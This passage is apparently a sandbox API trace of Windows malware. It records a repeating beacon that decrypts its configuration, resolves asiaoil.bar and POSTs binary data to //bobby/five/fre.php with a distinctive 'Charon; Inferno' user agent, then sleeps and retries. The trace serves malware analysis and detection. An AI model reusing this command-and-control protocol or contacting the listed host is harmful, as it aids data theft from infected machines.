Size=0xfd0) returned 0x755058 [0317.962] recv (in: s=0x334, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0318.055] GetProcessHeap () returned 0x740000 [0318.055] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0318.055] GetProcessHeap () returned 0x740000 [0318.056] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763e00 | out: hHeap=0x740000) returned 1 [0318.056] GetProcessHeap () returned 0x740000 [0318.056] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0318.056] GetProcessHeap () returned 0x740000 [0318.056] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cdd0 | out: hHeap=0x740000) returned 1 [0318.057] closesocket (s=0x334) returned 0 [0318.057] GetProcessHeap () returned 0x740000 [0318.057] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0318.057] GetProcessHeap () returned 0x740000 [0318.058] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0318.058] GetProcessHeap () returned 0x740000 [0318.058] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0318.058] GetProcessHeap () returned 0x740000 [0318.058] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0318.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf5c) returned 0x334 [0318.061] Sleep (dwMilliseconds=0xea60) [0318.063] GetProcessHeap () returned 0x740000 [0318.063] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0318.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ce58) returned 1 [0318.078] GetProcessHeap () returned 0x740000 [0318.078] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0318.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.079] CryptImportKey (in: hProv=0x75ce58, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0318.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.081] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.081] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.081] GetProcessHeap () returned 0x740000 [0318.082] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0318.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.083] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0318.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.084] CryptDestroyKey (hKey=0x74d768) returned 1 [0318.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.085] CryptReleaseContext (hProv=0x75ce58, dwFlags=0x0) returned 1 [0318.085] GetProcessHeap () returned 0x740000 [0318.085] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0318.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.086] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.086] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.087] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.088] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.088] GetProcessHeap () returned 0x740000 [0318.088] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0318.088] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.088] GetProcessHeap () returned 0x740000 [0318.089] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0318.110] GetProcessHeap () returned 0x740000 [0318.110] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0318.110] GetProcessHeap () returned 0x740000 [0318.111] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0318.111] GetProcessHeap () returned 0x740000 [0318.111] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763db8 [0318.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.118] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cdd0) returned 1 [0318.125] GetProcessHeap () returned 0x740000 [0318.125] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0318.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.126] CryptImportKey (in: hProv=0x75cdd0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0318.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.127] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.128] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.128] GetProcessHeap () returned 0x740000 [0318.129] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0318.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.129] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763db8, pdwDataLen=0x19fcfc | out: pbData=0x763db8, pdwDataLen=0x19fcfc) returned 1 [0318.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.130] CryptDestroyKey (hKey=0x74d768) returned 1 [0318.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.132] CryptReleaseContext (hProv=0x75cdd0, dwFlags=0x0) returned 1 [0318.132] GetProcessHeap () returned 0x740000 [0318.132] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0318.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.133] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0318.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.134] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0318.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.135] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0318.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.136] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0318.136] GetProcessHeap () returned 0x740000 [0318.136] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be68 [0318.136] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0318.137] GetProcessHeap () returned 0x740000 [0318.137] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0318.137] socket (af=2, type=1, protocol=6) returned 0x338 [0318.137] connect (s=0x338, name=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0318.160] FreeAddrInfoW (pAddrInfo=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0318.160] GetProcessHeap () returned 0x740000 [0318.161] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0318.161] GetProcessHeap () returned 0x740000 [0318.161] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0318.162] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.165] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0318.165] GetProcessHeap () returned 0x740000 [0318.165] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0318.165] GetProcessHeap () returned 0x740000 [0318.166] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.166] GetProcessHeap () returned 0x740000 [0318.166] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0318.166] GetProcessHeap () returned 0x740000 [0318.167] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0318.178] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.179] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0318.179] GetProcessHeap () returned 0x740000 [0318.179] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0318.179] GetProcessHeap () returned 0x740000 [0318.180] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.180] send (s=0x338, buf=0x747928*, len=243, flags=0) returned 243 [0318.180] send (s=0x338, buf=0x761fd0*, len=159, flags=0) returned 159 [0318.181] GetProcessHeap () returned 0x740000 [0318.181] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0318.181] recv (in: s=0x338, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0318.271] GetProcessHeap () returned 0x740000 [0318.271] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0318.272] GetProcessHeap () returned 0x740000 [0318.272] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0318.272] GetProcessHeap () returned 0x740000 [0318.273] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0318.273] GetProcessHeap () returned 0x740000 [0318.273] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0318.273] closesocket (s=0x338) returned 0 [0318.274] GetProcessHeap () returned 0x740000 [0318.274] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0318.274] GetProcessHeap () returned 0x740000 [0318.274] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0318.274] GetProcessHeap () returned 0x740000 [0318.274] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763db8 | out: hHeap=0x740000) returned 1 [0318.274] GetProcessHeap () returned 0x740000 [0318.274] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be68 | out: hHeap=0x740000) returned 1 [0318.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xffc) returned 0x338 [0318.276] Sleep (dwMilliseconds=0xea60) [0318.278] GetProcessHeap () returned 0x740000 [0318.278] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0318.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.287] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0318.295] GetProcessHeap () returned 0x740000 [0318.295] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0318.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.296] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0318.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.297] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.298] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.298] GetProcessHeap () returned 0x740000 [0318.299] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0318.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.300] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0318.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.300] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0318.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.301] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0318.301] GetProcessHeap () returned 0x740000 [0318.301] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766138 [0318.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.302] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.303] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.304] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.305] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.305] GetProcessHeap () returned 0x740000 [0318.305] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0318.305] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.305] GetProcessHeap () returned 0x740000 [0318.306] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0318.306] GetProcessHeap () returned 0x740000 [0318.306] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766138 | out: hHeap=0x740000) returned 1 [0318.306] GetProcessHeap () returned 0x740000 [0318.306] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0318.306] GetProcessHeap () returned 0x740000 [0318.307] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0318.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.308] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.352] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d210) returned 1 [0318.359] GetProcessHeap () returned 0x740000 [0318.359] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0318.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.360] CryptImportKey (in: hProv=0x75d210, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0318.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.361] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.361] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.361] GetProcessHeap () returned 0x740000 [0318.362] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0318.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.363] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0318.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.364] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0318.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0318.364] CryptReleaseContext (hProv=0x75d210, dwFlags=0x0) returned 1 [0318.365] GetProcessHeap () returned 0x740000 [0318.365] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0318.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.365] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0318.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.366] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0318.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.367] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0318.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.368] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0318.368] GetProcessHeap () returned 0x740000 [0318.368] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0318.368] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0318.370] GetProcessHeap () returned 0x740000 [0318.370] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0318.370] socket (af=2, type=1, protocol=6) returned 0x33c [0318.370] connect (s=0x33c, name=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0318.389] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0318.389] GetProcessHeap () returned 0x740000 [0318.389] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0318.389] GetProcessHeap () returned 0x740000 [0318.389] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0318.390] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.391] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0318.391] GetProcessHeap () returned 0x740000 [0318.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0318.391] GetProcessHeap () returned 0x740000 [0318.391] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.392] GetProcessHeap () returned 0x740000 [0318.392] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763938 [0318.392] GetProcessHeap () returned 0x740000 [0318.392] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0318.393] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0318.393] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0318.394] GetProcessHeap () returned 0x740000 [0318.394] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0318.394] GetProcessHeap () returned 0x740000 [0318.394] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0318.394] send (s=0x33c, buf=0x747928*, len=243, flags=0) returned 243 [0318.395] send (s=0x33c, buf=0x761fd0*, len=159, flags=0) returned 159 [0318.395] GetProcessHeap () returned 0x740000 [0318.395] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0318.395] recv (in: s=0x33c, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0318.507] GetProcessHeap () returned 0x740000 [0318.508] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0318.508] GetProcessHeap () returned 0x740000 [0318.508] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0318.508] GetProcessHeap () returned 0x740000 [0318.509] HeapFree (in: hHeap=0x740000, dwFlags=0x0, 